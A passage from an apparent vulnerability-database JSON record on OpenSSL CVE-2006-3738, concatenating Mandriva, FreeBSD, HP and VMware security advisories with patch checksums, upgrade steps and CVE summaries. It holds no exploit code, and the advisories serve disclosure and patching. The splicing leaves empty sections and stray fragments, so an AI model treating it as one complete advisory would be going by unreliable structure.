2006.0/SRPMS/openssl-0.9.7g-2.5.20060mdk.src.rpm\n\n Mandriva Linux 2007.0:\n db68f8f239604fb76a0a10c70104ef61  2007.0/i586/libopenssl0.9.8-0.9.8b-2.2mdv2007.0.i586.rpm\n 26a4de823aee08e40d28ed7e6ff5b2ff  2007.0/i586/libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0.i586.rpm\n ab949cf85296ceae864f83fbbac2b55a  2007.0/i586/libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.i586.rpm\n a97c6033a33fabcd5509568304b7a988  2007.0/i586/openssl-0.9.8b-2.2mdv2007.0.i586.rpm \n 78964615b7bd71028671257640be3bc5  2007.0/SRPMS/openssl-0.9.8b-2.2mdv2007.0.src.rpm\n\n Mandriva Linux 2007.0/X86_64:\n 1895971ef1221056075c4ee3d4aaac72  2007.0/x86_64/lib64openssl0.9.8-0.9.8b-2.2mdv2007.0.x86_64.rpm\n cfd59201e5e9c436f42b969b4aa567f1  2007.0/x86_64/lib64openssl0.9.8-devel-0.9.8b-2.2mdv2007.0.x86_64.rpm\n 36da85c76eddf95feeb3f4b792528483  2007.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.x86_64.rpm\n db68f8f239604fb76a0a10c70104ef61  2007.0/x86_64/libopenssl0.9.8-0.9.8b-2.2mdv2007.0.i586.rpm\n 26a4de823aee08e40d28ed7e6ff5b2ff  2007.0/x86_64/libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0.i586.rpm\n ab949cf85296ceae864f83fbbac2b55a  2007.0/x86_64/libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.i586.rpm\n e3aebeae455a0820c5f28483bd6d3fa5  2007.0/x86_64/openssl-0.9.8b-2.2mdv2007.0.x86_64.rpm \n 78964615b7bd71028671257640be3bc5  2007.0/SRPMS/openssl-0.9.8b-2.2mdv2007.0.src.rpm\n\n Corporate 3.0:\n 7f60837e42b45ce50f365ec1372d6aeb  corporate/3.0/i586/libopenssl0.9.7-0.9.7c-3.7.C30mdk.i586.rpm\n 1e7834f6f0fe000f8f00ff49ee6f7ea0  corporate/3.0/i586/libopenssl0.9.7-devel-0.9.7c-3.7.C30mdk.i586.rpm\n 6c86220445ef34c2dadadc3e00701885  corporate/3.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.7.C30mdk.i586.rpm\n c25c4042a91b6e7bf9aae1aa2fea32a5  corporate/3.0/i586/openssl-0.9.7c-3.7.C30mdk.i586.rpm \n 2c47b1604aa89033799b1ead4bcebe01  corporate/3.0/SRPMS/openssl-0.9.7c-3.7.C30mdk.src.rpm\n\n Corporate 3.0/X86_64:\n 52dfd4d10e00c9bd0944e4486190de93  corporate/3.0/x86_64/lib64openssl0.9.7-0.9.7c-3.7.C30mdk.x86_64.rpm\n 258a19afc44dadfaa00d0ebd8b3c0df4  corporate/3.0/x86_64/lib64openssl0.9.7-devel-0.9.7c-3.7.C30mdk.x86_64.rpm\n cd5cc151e476552be549c6a37b8a71ea  corporate/3.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7c-3.7.C30mdk.x86_64.rpm\n 7f60837e42b45ce50f365ec1372d6aeb  corporate/3.0/x86_64/libopenssl0.9.7-0.9.7c-3.7.C30mdk.i586.rpm\n 492fcc0df9172557a3297d0082321d4d  corporate/3.0/x86_64/openssl-0.9.7c-3.7.C30mdk.x86_64.rpm \n 2c47b1604aa89033799b1ead4bcebe01  corporate/3.0/SRPMS/openssl-0.9.7c-3.7.C30mdk.src.rpm\n\n Corporate 4.0:\n 76b3078e53be2ddc019bee74ccb1f39e  corporate/4.0/i586/libopenssl0.9.7-0.9.7g-2.5.20060mlcs4.i586.rpm\n 0aa4ca3b0d2925255650fb90132d7aad  corporate/4.0/i586/libopenssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.i586.rpm\n 86dc91f1701293f3319a833746bbe421  corporate/4.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.i586.rpm\n daa6c3473f59405778dedd02de73fcc9  corporate/4.0/i586/openssl-0.9.7g-2.5.20060mlcs4.i586.rpm \n a8d2a946d266a94c6d46537ad78b18fa  corporate/4.0/SRPMS/openssl-0.9.7g-2.5.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n b5ae71aacd5b99be9e9327d58da29230  corporate/4.0/x86_64/lib64openssl0.9.7-0.9.7g-2.5.20060mlcs4.x86_64.rpm\n 89296e03778a198940c1c413e44b9f45  corporate/4.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.x86_64.rpm\n cb17a0d801c1181ab380472b8ffb085e  corporate/4.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.x86_64.rpm\n 76b3078e53be2ddc019bee74ccb1f39e  corporate/4.0/x86_64/libopenssl0.9.7-0.9.7g-2.5.20060mlcs4.i586.rpm\n 0aa4ca3b0d2925255650fb90132d7aad  corporate/4.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.i586.rpm\n 86dc91f1701293f3319a833746bbe421  corporate/4.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.i586.rpm\n 8d9a55afdc6d930916bac00fd4c4739b  corporate/4.0/x86_64/openssl-0.9.7g-2.5.20060mlcs4.x86_64.rpm \n a8d2a946d266a94c6d46537ad78b18fa  corporate/4.0/SRPMS/openssl-0.9.7g-2.5.20060mlcs4.src.rpm\n\n Multi Network Firewall 2.0:\n cd7ad7e95ce17995dfa8129ebe517049  mnf/2.0/i586/libopenssl0.9.7-0.9.7c-3.7.M20mdk.i586.rpm\n 11771240baebdc6687af70a8a0f2ffd2  mnf/2.0/i586/libopenssl0.9.7-devel-0.9.7c-3.7.M20mdk.i586.rpm\n 8f672bc81b9528598a8560d876612bfa  mnf/2.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.7.M20mdk.i586.rpm\n 214f857a36e5c3e600671b7291cd08ae  mnf/2.0/i586/openssl-0.9.7c-3.7.M20mdk.i586.rpm \n bbb299fd643ccbfbdc1a48b12c7005ce  mnf/2.0/SRPMS/openssl-0.9.7c-3.7.M20mdk.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.2.2 (GNU/Linux)\n\niD8DBQFFIU7bmqjQ0CJFipgRAuYAAKCZlwMqJzrVCpKYdEqs+UiyM6WrSQCfeIv3\nmAaLoEPfjUca1TR98vgpZUU=\n=Ff9O\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCorrected:      2007-10-03 21:39:43 UTC (RELENG_6, 6.2-STABLE)\n                2007-10-03 21:40:35 UTC (RELENG_6_2, 6.2-RELEASE-p8)\n                2007-10-03 21:41:22 UTC (RELENG_6_1, 6.1-RELEASE-p20)\n                2007-10-03 21:42:00 UTC (RELENG_5, 5.5-STABLE)\n                2007-10-03 21:42:32 UTC (RELENG_5_5, 5.5-RELEASE-p16)\nCVE Name:       CVE-2007-5135\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:http://security.FreeBSD.org/\u003e.   Background\n\nFreeBSD includes software from the OpenSSL Project.  The OpenSSL Project is\na collaborative effort to develop a robust, commercial-grade, full-featured,\nand Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols as well as a full-strength\ngeneral purpose cryptography library. \n\nII. \n\nIII. \n\nIV.  Workaround\n\nNo workaround is available, but only applications using the\nSSL_get_shared_ciphers() function are affected.   Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to 5-STABLE, or 6-STABLE, or to the\nRELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the\ncorrection date. \n\n2) To patch your present system:\n\nThe following patch have been verified to apply to FreeBSD 5.5, 6.1,\nand 6.2 systems. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n# fetch http://security.FreeBSD.org/patches/SA-07:08/openssl.patch\n# fetch http://security.FreeBSD.org/patches/SA-07:08/openssl.patch.asc\n\nb) Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n# cd /usr/src/secure/lib/libssl\n# make obj \u0026\u0026 make depend \u0026\u0026 make \u0026\u0026 make install\n\nVI.  Correction details\n\nThe following list contains the revision numbers of each file that was\ncorrected in FreeBSD. \n\nBranch                                                           Revision\n  Path\n- -------------------------------------------------------------------------\nRELENG_5\n  src/crypto/openssl/ssl/ssl_lib.c                           1.1.1.11.2.3\nRELENG_5_5\n  src/UPDATING                                            1.342.2.35.2.16\n  src/sys/conf/newvers.sh                                  1.62.2.21.2.18\n  src/crypto/openssl/ssl/ssl_lib.c                       1.1.1.11.2.1.4.2\nRELENG_6\n  src/crypto/openssl/ssl/ssl_lib.c                           1.1.1.12.2.2\nRELENG_6_2\n  src/UPDATING                                            1.416.2.29.2.11\n  src/sys/conf/newvers.sh                                  1.69.2.13.2.11\n  src/crypto/openssl/ssl/ssl_lib.c                       1.1.1.12.2.1.2.1\nRELENG_6_1\n  src/UPDATING                                            1.416.2.22.2.22\n  src/sys/conf/newvers.sh                                  1.69.2.11.2.22\n  src/crypto/openssl/ssl/ssl_lib.c                           1.1.1.12.6.2\n- -------------------------------------------------------------------------\n\nVII. \n________________________________________________________________________\n\nReferences:\n  [0] http://www.openssl.org/news/secadv_20060928.txt \n  [1] http://www.openssl.org/\n  [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n  [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n  [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n  [5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n________________________________________________________________________\n\nFor security reasons, this advisory was digitally signed with the\nOpenPGP public key \"OpenPKG \u003copenpkg@openpkg.org\u003e\" (ID 63C4CB9F) of the\nOpenPKG project which you can retrieve from http://pgp.openpkg.org and\nhkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org\nfor details on how to verify the integrity of this advisory. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c02824490\nVersion: 1\n\nHPSBOV02683 SSRT090208 rev.1 - HP Secure Web Server (SWS) for OpenVMS running Apache/PHP, Remote Denial of Service (DoS), Unauthorized Access, Unauthorized Disclosure of Information, Unauthorized Modification\n\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible. \n\nRelease Date: 2011-05-05\nLast Updated: 2011-05-05\n\nPotential Security Impact: Remote Denial of Service (DoS), unauthorized access, unauthorized disclosure of information, unauthorized modification\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential vulnerabilities have been identified with HP Secure Web Server (SWS) for OpenVMS running Apache and PHP. The vulnerabilities could be remotely exploited to create a Denial of Service (DoS), unauthorized access, unauthorized disclosure of information, or unauthorized modifications. \n\nReferences: CVE-2002-0839, CVE-2002-0840, CVE-2003-0542, CVE-2004-0492, CVE-2005-2491, CVE-2005-3352, CVE-2005-3357, CVE-2006-2937, CVE-2006-2940, CVE-2006-3738, CVE-2006-3747, CVE-2006-3918, CVE-2006-4339, CVE-2006-4343, CVE-2007-5000, CVE-2007-6388, CVE-2008-0005, CVE-2009-1891, CVE-2009-3095, CVE-2009-3291, CVE-2009-3292, CVE-2009-3293, CVE-2009-3555, CVE-2010-0010\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Secure Web Server (SWS) for OpenVMS (based on Apache) V2.1-1 and earlier. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2002-0839    (AV:L/AC:L/Au:N/C:C/I:C/A:C)        7.2\nCVE-2002-0840    (AV:N/AC:M/Au:N/C:P/I:P/A:P)        6.8\nCVE-2003-0542    (AV:L/AC:L/Au:N/C:C/I:C/A:C)        7.2\nCVE-2004-0492    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0\nCVE-2005-2491    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2005-3352    (AV:N/AC:M/Au:N/C:N/I:P/A:N)        4.3\nCVE-2005-3357    (AV:N/AC:H/Au:N/C:N/I:N/A:C)        5.4\nCVE-2006-2937    (AV:N/AC:L/Au:N/C:N/I:N/A:C)        7.8\nCVE-2006-2940    (AV:N/AC:L/Au:N/C:N/I:N/A:C)        7.8\nCVE-2006-3738    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0\nCVE-2006-3747    (AV:N/AC:H/Au:N/C:C/I:C/A:C)        7.6\nCVE-2006-3918    (AV:N/AC:M/Au:N/C:N/I:P/A:N)        4.3\nCVE-2006-4339    (AV:N/AC:M/Au:N/C:P/I:N/A:N)        4.3\nCVE-2006-4343    (AV:N/AC:M/Au:N/C:N/I:N/A:P)        4.3\nCVE-2007-5000    (AV:N/AC:M/Au:N/C:N/I:P/A:N)        4.3\nCVE-2007-6388    (AV:N/AC:M/Au:N/C:N/I:P/A:N)        4.3\nCVE-2008-0005    (AV:N/AC:M/Au:N/C:N/I:P/A:N)        4.3\nCVE-2009-1891    (AV:N/AC:M/Au:N/C:N/I:N/A:C)        7.1\nCVE-2009-3095    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2009-3291    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2009-3292    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2009-3293    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5\nCVE-2009-3555    (AV:N/AC:M/Au:N/C:N/I:P/A:P)        5.8\nCVE-2010-0010    (AV:N/AC:M/Au:N/C:P/I:P/A:P)        6.8\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has made the following software updates available to resolve these vulnerabilities. \n\nKit Name\n Location\n\nHP SWS V2.2 for OpenVMS Alpha and OpenVMS Integrity servers. \n http://h71000.www7.hp.com/openvms/products/ips/apache/csws.html\n\nCSWS_PHP V2.2\n http://h71000.www7.hp.com/openvms/products/ips/apache/csws_php.html\n\nHISTORY\nVersion:1 (rev.1) - 5 May 2011 Initial release\n\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For further information, contact normal HP Services support channel. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. \nTo get the security-alert PGP key, please send an e-mail message as follows:\n  To: security-alert@hp.com\n  Subject: get key\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA\u0026langcode=USENG\u0026jumpid=in_SC-GEN__driverITRC\u0026topiccode=ITRC\nOn the web page: ITRC security bulletins and patch sign-up\nUnder Step1: your ITRC security bulletins and patches\n    -check ALL categories for which alerts are required and continue. \nUnder Step2: your ITRC operating systems\n    -verify your operating system selections are checked and save. \n\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\nLog in on the web page: Subscriber\u0027s choice for Business: sign-in. \nOn the web page: Subscriber\u0027s Choice: your profile summary - use Edit Profile to update appropriate sections. \n\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\n\n* The Software Product Category that this Security Bulletin\nrelates to is represented by the 5th and 6th characters\nof the Bulletin number in the title:\n\nGN = HP General SW\nMA = HP Management Agents\nMI = Misc. 3rd Party SW\nMP = HP MPE/iX\nNS = HP NonStop Servers\nOV = HP OpenVMS\nPI = HP Printing \u0026 Imaging\nST = HP Storage SW\nTL = HP Trusted Linux\nTU = HP Tru64 UNIX\nUX = HP-UX\nVV = HP VirtualVault\n\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. \n\n\"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user\u0027s use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\"\n\nCopyright 2011 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. \nHP System Management Homepage (SMH) versions prior to 2.1.7 running on Linux and Windows. \n\nBACKGROUND\n\n\nRESOLUTION\nHP has provided System Management Homepage (SMH) version 2.1.7 or subsequent for each platform to resolve this issue. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n- -------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID:       VMSA-2007-0001\nSynopsis:          VMware ESX server security updates\nIssue date:        2007-01-08\nUpdated on:        2007-01-08\nCVE:               CVE-2006-3589 CVE-2006-2937 CVE-2006-2940\n                   CVE-2006-3738 CVE-2006-4339 CVE-2006-4343\n                   CVE-2006-4980\n- -------------------------------------------------------------------\n\n1. Summary:\n\nUpdated ESX Patches address several security issues. \n\n2. Relevant releases:\n\nVMware ESX 3.0.1 without patch ESX-9986131\nVMware ESX 3.0.0 without patch ESX-3069097\n\nVMware ESX 2.5.4 prior to upgrade patch 3\nVMware ESX 2.5.3 prior to upgrade patch 6\nVMware ESX 2.1.3 prior to upgrade patch 4\nVMware ESX 2.0.2 prior to upgrade patch 4\n\n3. Problem description:\n\nProblems addressed by these patches:\n\na. Incorrect permissions on SSL key files generated  by vmware-config\n(CVE-2006-3589):\n\n    ESX 3.0.1: does not have this problem\n    ESX 3.0.0: does not have this problem\n    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)\n    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)\n    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)\n    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)\n\n    A possible security issue with the configuration program\n    vmware-config which could set incorrect permissions on SSL key\n    files. Local users may be able to obtain access to the SSL key\n    files. The Common Vulnerabilities and Exposures project\n    (cve.mitre.org) assigned the name CVE-2006-3589 to this issue. \n\nb. OpenSSL library vulnerabilities:\n\n    ESX 3.0.1: corrected by ESX 3.0.1 Patch ESX-9986131\n    ESX 3.0.0: corrected by ESX 3.0.0 Patch ESX-3069097\n    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)\n    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)\n    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)\n    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)\n\n    (CVE-2006-2937) OpenSSL 0.9.7 before 0.9.7l and 0.9.8 before 0.9.8d\n    allows remote attackers to cause a denial of service (infinite\n    loop and memory consumption) via malformed ASN.1 structures that\n    trigger an improperly handled error condition. \n\n    (CVE-2006-2940) OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d,\n    and earlier versions allows attackers to cause a denial of service\n    (CPU consumption) via parasitic public keys with large (1) \"public\n    exponent\" or (2) \"public modulus\" values in X.509 certificates that\n    require extra time to process when using RSA signature verification. \n\n    (CVE-2006-4339) OpenSSL before 0.9.7, 0.9.7 before 0.9.7k, and 0.9.8\n    before 0.9.8c, when using an RSA key with exponent 3, removes PKCS-1\n    padding before generating a hash, which allows remote attackers to\n    forge a PKCS #1 v1.5 signature that is signed by that RSA key and\n    prevents OpenSSL from correctly verifying X.509 and other\n    certificates that use PKCS #1. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    assigned the names CVE-2006-2937, CVE-2006-2940, CVE-2006-3738,\n    CVE-2006-4339, and CVE-2006-4343 to these issues. \n\nc. Updated OpenSSH package addresses the following possible security issues:\n\n    ESX 3.0.1: corrected by Patch ESX-9986131\n    ESX 3.0.0: corrected by Patch ESX-3069097\n    ESX 2.5.4: does not have these problems\n    ESX 2.5.3: does not have these problems\n    ESX 2.1.3: does not have these problems\n    ESX 2.0.2: does not have these problems\n\n    (CVE-2004-2069) sshd.c in OpenSSH 3.6.1p2 and 3.7.1p2 and possibly\n    other versions, when using privilege separation, does not properly\n    signal the non-privileged process when a session has been terminated\n    after exceeding the LoginGraceTime setting, which leaves the\n    connection open and allows remote attackers to cause a denial of\n    service (connection consumption). \n\n    (CVE-2006-0225) scp in OpenSSH 4.2p1 allows attackers to execute\n    arbitrary commands via filenames that contain shell metacharacters\n    or spaces, which are expanded twice. \n\n    (CVE-2003-0386) OpenSSH 3.6.1 and earlier, when restricting host\n    access by numeric IP addresses and with VerifyReverseMapping\n    disabled, allows remote attackers to bypass \"from=\" and \"user@host\"\n    address restrictions by connecting to a host from a system whose\n    reverse DNS hostname contains the numeric IP address. \n\n    (CVE-2006-4924) sshd in OpenSSH before 4.4, when using the version 1\n    SSH protocol, allows remote attackers to cause a denial of service\n    (CPU consumption) via an SSH packet that contains duplicate blocks,\n    which is not properly handled by the CRC compensation attack\n    detector. \n\n    NOTE: ESX by default disables version 1 SSH protocol. \n\n    (CVE-2006-5051) Signal handler race condition in OpenSSH before 4.4\n    allows remote attackers to cause a denial of service (crash), and\n    possibly execute arbitrary code if GSSAPI authentication is enabled,\n    via unspecified vectors that lead to a double-free. \n\n    NOTE: ESX doesn\u0027t use GSSAPI by default. \n\n    (CVE-2006-5794) Unspecified vulnerability in the sshd Privilege\n    Separation Monitor in OpenSSH before 4.5 causes weaker verification\n    that authentication has been successful, which might allow attackers\n    to bypass authentication. \n\n    NOTE: as of 20061108, it is believed that this issue is only\n    exploitable by leveraging vulnerabilities in the unprivileged\n    process, which are not known to exist. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    assigned the names CVE-2004-2069, CVE-2006-0225, CVE-2003-0386,\n    CVE-2006-4924, CVE-2006-5051, and CVE-2006-5794 to these issues. \n\nd. Object reuse problems with newly created virtual disk (.vmdk or .dsk)\nfiles:\n\n    ESX 3.0.1: does not have this problem\n    ESX 3.0.0: does not have this problem\n    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)\n    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)\n    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)\n    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)\n\n    A possible security issue with virtual disk (.vmdk or .dsk) files\n    that are newly created, but contain blocks from recently deleted\n    virtual disk files.  Information belonging to the previously\n    deleted virtual disk files could be revealed in newly created\n    virtual disk files. \n\n    VMware recommends the following workaround: When creating new\n    virtual machines on an ESX Server that may contain sensitive\n    data, use vmkfstools with the -W option. This initializes the\n    virtual disk with zeros.  NOTE: ESX 3.x defines this option as -w. \n\ne. Buffer overflow in Python function repr():\n\n    ESX 3.0.1: corrected by Patch ESX-9986131\n    ESX 3.0.0: corrected by ESX-3069097\n    ESX 2.5.4: does not have this problem\n    ESX 2.5.3: does not have this problem\n    ESX 2.1.3: does not have this problem\n    ESX 2.0.2: does not have this problem\n\n    A possible security issue with how the Python function repr()\n    function handles UTF-32/UCS-4 strings. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    assigned the name CVE-2006-4980 to this issue. \n\n4. Solution:\n\nPlease review the Patch notes for your version of ESX and verify the md5sum. \n\n  ESX 3.0.1\n  http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html\n  md5usm: 239375e107fd4c7af57663f023863fcb\n\n  ESX 3.0.0\n  http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html\n  md5sum: ca9947239fffda708f2c94f519df33dc\n\n  ESX 2.5.4\n  http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html\n  md5sum: 239375e107fd4c7af57663f023863fcb\n\n  ESX 2.5.3\n  http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html\n  md5sum: f90fcab28362edbf2311f3ca90cc7739\n\n  ESX 2.1.3\n  http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html\n  md5sum: 7d7d0e40f4dccd5ca64b9c13a856da8f\n\n  ESX 2.0.2\n  http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html\n  md5sum: 925e70f28d17714c53fdbd24de64329f\n\n\n5. References:\n\nESX 3.0.0 Patch URL:\nhttp://www.vmware.com/support/vi3/doc/esx-3069097-patch.html\nKnowledge base URL:  http://kb.vmware.com/kb/3069097\n\nESX 3.0.1 Patch URL:\nhttp://www.vmware.com/support/vi3/doc/esx-9986131-patch.html\nKnowledge base URL:  http://kb.vmware.com/kb/9986131\n\nESX 2.5.4 Patch URL:\nhttp://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html\n\nESX 2.5.3 Patch URL:\nhttp://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html\n\nESX 2.1.3 Patch URL:\nhttp://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html\n\nESX 2.0.2 Patch URL:\nhttp://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3589\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4980\n\n6. Contact:\n\nhttp://www.vmware.com/security\n\nVMware Security Response Policy\nhttp://www.vmware.com/vmtn/technology/security/security_response.html\n\nE-mail:  security@vmware.com\n\nCopyright 2007 VMware Inc. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (GNU/Linux)\n\niD8DBQFFovs16KjQhy2pPmkRCMfyAKCXhdGwZyXW5VzSwcOmu2NNXKN/OwCgo+CE\nneFG0RikD74TCYeXKW6CBy4=\n=9/6k\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          },
          {
            "db": "CERT/CC",
            "id": "VU#221788"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "BID",
            "id": "22083"
          },
          {
            "db": "PACKETSTORM",
            "id": "169663"
          },
          {
            "db": "PACKETSTORM",
            "id": "50595"
          },
          {
            "db": "PACKETSTORM",
            "id": "50543"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "PACKETSTORM",
            "id": "59797"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "101257"
          },
          {
            "db": "PACKETSTORM",
            "id": "58346"
          },
          {
            "db": "PACKETSTORM",
            "id": "50548"
          },
          {
            "db": "PACKETSTORM",
            "id": "53566"
          }
        ],
        "trust": 5.94
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "BID",
            "id": "22083",
            "trust": 3.7
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "20249",
            "trust": 2.9
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300",
            "trust": 2.9
          },
          {
            "db": "SECUNIA",
            "id": "23280",
            "trust": 2.6
          },
          {
            "db": "SECUNIA",
            "id": "23309",
            "trust": 2.6
          },
          {
            "db": "SECUNIA",
            "id": "22130",
            "trust": 2.6
          },
          {
            "db": "SECUNIA",
            "id": "22207",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22212",
            "trust": 1.8
